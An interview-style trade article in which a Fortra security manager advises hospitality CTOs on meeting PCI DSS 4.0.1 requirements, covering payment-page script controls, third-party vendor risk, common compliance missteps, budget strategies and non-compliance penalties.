Time's Up: What Hospitality CTOs Must Do Now for PCI DSS 4.0.1 Compliance

The clock is ticking for hospitality businesses to achieve PCI DSS 4.0.1 compliance before the March 31 deadline. With new documentation and security requirements becoming mandatory, CTOs must act swiftly to assess gaps, implement necessary controls, and ensure third-party vendors are also prepared. Josh Davies, principal technical manager at global cybersecurity provider Fortra, shares critical insights on the most pressing compliance updates, common missteps, and cost-effective strategies to meet requirements without compromising security.

For hospitality IT leaders who are still working toward PCI DSS 4.0.1 compliance, what are the most critical updates they need to focus on before the March 31 deadline? 

• Time is against you. To be compliant, you must have implemented all the requirements in PCI DSS 4.0.1, which will move from being ‘best practice’ to mandatory by the March 31st deadline. There are 64 new requirements in 4.0.1 compared to 3.2.1, although many relate to changes in process and documentation rather than actual technical controls.
• 4.0.1 did not add any new requirements; instead, it clarified the intent and focus of existing requirements.
• Hopefully, you have already begun preparations for the March 31st deadline. The first step is to document your existing security controls and configurations to the new requirements and identify gaps. Categorize the outstanding actions by 1. Can be addressed with existing control 2. Requires updated documentation/process 3. Requires a new control.
• If there are outstanding actions, it is worth prioritizing those that are the most difficult to implement, i.e., those that cannot be resolved by documenting a new process or changing configurations on existing controls (categories 1 and 2). This would include the new requirements around passphrases, MFA, and the documentation around roles and responsibilities.
• An example of a more challenging new requirement that may require a new control would be the requirements intended to prevent card skimming attacks and protect your customers from having their payment information stolen.
• However, there are single solutions or processes that can address multiple related requirements if selected and implemented wisely.
• 6.4.3 requires every script loaded on payment pages to be documented and authorized. 11.6.1 is focused on ensuring the integrity of payment pages delivered to end users. 
• Documenting scripts can be done manually, but that will be cumbersome and leave a large window of opportunity for an attacker to steal payment details via XSS (cross site scripting) before it is noticed and removed.
• A WAF, also now required in 6.4.2, is a much better solution. Automating the script discovery and including approval mechanisms that only allow approved and authorized scripts to run – eliminating the possibility of XSS against your users. 
• You probably have a WAF, or maybe your hosting partner manages one for you. It may only be a case of buying and/or configuring an extra client-side protection module. 
• These requirements were a response to the prolific Magecart card skimmers but are still very relevant, as just this month, we saw $1.5 billion in cryptocurrency stolen via a malicious JavaScript embedded into a transaction webpage. 

Many hotels and restaurants work with multiple third-party vendors. How has PCI DSS 4.0.1 changed security expectations for these vendor relationships, and what should CTOs be doing now to mitigate risk? 

• PCI DSS 4.0 recognizes the key role that third-party service providers play for hospitality and their IT.
• But they can also introduce risk. Time and time again we have seen threat actors be successful in compromising a third-party provider, or the software they use for remote management, to pass on compromise to their customers in a supply chain attack.
• Organizations are now responsible for documenting responsibilities and risks with their third-party providers.
• Due diligence must be taken to assess the provider's security controls and processes.
• Activity from third parties must be monitored, with alerts to identify abuse.
• CTOs can ask their providers what they have been doing to prepare for PCI 4.0. Good third-party providers will already have documentation they can share to demonstrate their roles and responsibilities, as well as how they are addressing potential risks that are introduced into the CTO’s org by nature of the provider relationship.
• CTOs should also remember that third-party providers, especially managed security providers, may be able to offer further support in quickly achieving compliance with 4.0. Ask the question, "What more could you do to help me achieve PCI DSS 4.0 compliance?" 

What are the most common compliance missteps you’re seeing in the hospitality industry, and what practical steps can CTOs take to correct them before the deadline? 

• The Hospitality industry faces the challenge of applying consistent security across a wide range of technologies and sites. Understanding what systems are in scope for payment protection is the first step in determining how to deploy controls to meet compliance efficiently.
• The set-it-and-forget-it mentality: buying controls or services to meet compliance deadlines and then forgetting all about it until it’s audit time. Not only does this make for an unnecessarily stressful audit, but it also increases the risk of compromise to your organization, employees, and customers.
• Leaving it too late: PCI DSS 4.0 requirements were introduced as ‘best practices’ in April 2024, so there has been ample time to prepare for the ‘mandatory’ deadline at the end of March 2025.
• Focusing only on compliance and not security goes against the spirit of these new regulations, which allow for more flexible, ‘customized approaches’ to security. These approaches allow you to implement unspecified controls or processes that may be better for your technology, security strategy, or use cases while still adhering to the defined requirements. 

Beyond compliance, what real-world security risks do hospitality businesses face if they don’t fully adhere to PCI DSS 4.0.1? 

• Money is the number one motivator for cybercriminals. In 2024, cybercrime cost the world $9.5 trillion USD and could be considered the third-largest economy if measured as a country. This year, we have already seen significant heists, including $1.5 billion stolen.
• Hospitality organizations are attractive targets for threat actors, as they can monetize a compromise in multiple ways.
• Hospitality organizations deal with personal and payment information daily. There is plenty of data to steal, many opportunities to do so, and easy ways to monetize the stolen data, making hospitality a prime target for data exfiltration objectives.
• Additionally, they face intense pressure to maintain smooth and consistent operations; otherwise, they risk losing revenue or having to issue refunds to customers who can't secure the hotel room or meal they needed. Threat actors know this, and apply the pressure in ransomware objectives, as they know every day you cannot do business is $X lost and paying the ransom becomes more justifiable. (Note: don’t pay the ransoms, you are only feeding the beast!) 

You mentioned that future updates might include heightened scrutiny on third-party suppliers and AI-driven threats. How should CTOs in hospitality start preparing for these potential changes now? 

• The focus on third-party suppliers ensures they are included in your risk assessments, as many will have access to your data or network—often with high-level privileges. You also may be using hardware or software that they are responsible for securing, which could introduce risk to your business if not addressed.
• Reach out to your third-party providers and ask for any security certifications they have. ISO, SOC2 and NIST are good examples that will demonstrate that they have a certain baseline of security in place. 
• You should also do a threat modelling exercise on your third-party suppliers, with and without their participation, so you understand how the third party introduces risk to your business and how you can mitigate risk from each side.
• AI-driven threats are lowering the barrier to entry for attackers and making them more efficient. This trend has continued since before generative AI burst onto the scene and is always important to address.
• So far, AI hasn't introduced entirely new threats—only enhancements to existing tactics and techniques. However, this remains a closely watched area. If that changes, hospitality businesses can rely on a trusted security partner to stay informed and prepared.
• It would not be sufficient to wait for new compliance requirements to arrive to address these threats, as compliance frameworks are not agile enough and tend to lag behind the evolving threat landscape.

For hotels and restaurants already facing budget constraints, what are some cost-effective strategies to achieve compliance without compromising security? 

• Managed security services can be a cost-effective way to augment your IT team, or security team if you have one. The consistent pricing will allow for easier forecasting and shield you from the uncertainty of hiring, training, and maintaining a security team in a world where qualified security personnel are scarce.
• Vendor consolidation can be a cost-effective way to achieve compliance and security goals.
• Choose a vendor that prioritizes security innovation, exceeding compliance requirements while providing strong compliance reporting and ongoing feature development. 

What are the potential penalties for non-compliance, and how can CTOs communicate the urgency of compliance to executive leadership who may not be as familiar with PCI DSS requirements? 

• Fines: you will receive a fine for non-compliance based on your business size and the time period of non-compliance. If there is a breach, fines are an additional $50-90 for each exposed customer record.
• Payment card processing restrictions: resulting in a direct loss of revenue and likely forcing you to enter an expensive partnership with a third party to handle transactions
• Diminished reputation & legal fees: somewhat harder to predict, but these costs can be significant, with many consumers choosing not to trust brands that have been actively involved in breaches.
• To communicate urgency, connect each of the above scenarios to the bottom line. How much money would we lose if we were taken offline for a week to recover from a ransomware attack? How many customers would we miss out on if we can’t process payments? The longer you are non-compliant, the more likely you are to be compromised, and the bigger compliance fines will be. PCI compliance strengthens your security, reducing the risk of breaches, fines, and other consequences of non-compliance—ensuring your customers can trust you with their payment data.